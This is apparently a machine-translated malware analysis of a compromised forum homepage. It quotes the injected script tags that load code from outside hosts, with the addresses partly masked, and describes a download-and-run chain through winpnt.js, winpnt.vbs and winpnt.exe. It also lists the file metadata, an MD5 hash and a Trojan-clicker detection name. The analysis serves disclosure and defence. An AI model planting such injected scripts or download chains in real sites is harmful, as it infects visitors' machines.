A forum was added to download Trojan-clicker.Win32.VB.qq code

EndurerOriginal

1Version

Code added to the Forum homepage:

/------
<Script language = "JavaScript" src = "hxxp: // * 61.146.118.1*1/news ***/include */M *** d5.asp? Ad * = 1 ***** "> </SCRIPT>
------/

M *** d5.asp? Ad * = 1 ****Code found in:
/------
Document. Write ("<script language =/" javascript/"src =/" hxxp: // www.cnfish.com/editor/htmleditor/images/winpnt.js/ "> </SCRIPT> ");
------/

Winpnt. jsThe Javascript script program is found. The function is to output a VBScript program.
The function of this VBScript is to call the custom function R (k) for decryption ~ Separate and execute the numeric string, using Microsoft. XMLHTTP and SCR accept pting. fileSystemObject from another website hxxp: // www. c *** NFI *** sh **. com. **/download the winpnt file. vbs, save as % Temp %/winpnt. vbs, using shell. use the ShellExecute method of the Application Object Q.

Winpnt. vbsContains the VBSCRIPT script program and downloads the winpnt file. EXE, save as % Temp %/winpnt. EXE, using wscript. sleep pause the script for 5 seconds (5000 ms) and then use wscript. run the run method of the shell object.

Winpnt. exeWritten in VB, ASPack 2.12-> Alexey solodovnikov shelling.
/----
File Description: D:/test/winpnt. exe
Attribute: ---
Language: Chinese (China)
File version: 5.2600.2180
Note: Microsoft Internet Explorer
Copyright: C) Microsoft Corporation. All rights reserved.
Note: Microsoft Windows Printer
Product Version: 5.2600.2180
Product Name: Microsoft Windows Printer
Company Name: Microsoft Corporation
Legal trademark:
Internal name: winpnt
Source File Name: winpnt. exe
Creation Time: 21:26:56
Modification time: 21:26:58
Access time:
Size: 23552 bytes, 23.0 KB
MD5: 5c7ced24b750740ca747d943feb11c1c
----/
Kaspersky reports:Trojan-clicker.Win32.VB.qq

This meeting
Create a startup item under the Registry Run key
A batch of ad url lists are built in, and the ad window is displayed randomly.
Seems to have the online file upgrade or download function